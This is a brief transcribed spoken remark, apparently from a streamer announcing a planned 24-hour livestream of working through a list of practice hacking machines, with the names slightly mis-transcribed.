yeah, I plan on starting like 9, 10 a.m. or something like that my time. And I'm planning on doing 24-hour stream or until we just finish up with the whole bunch of what are they called? A whole bunch of TJ Knowles boxes off of Vault Hub.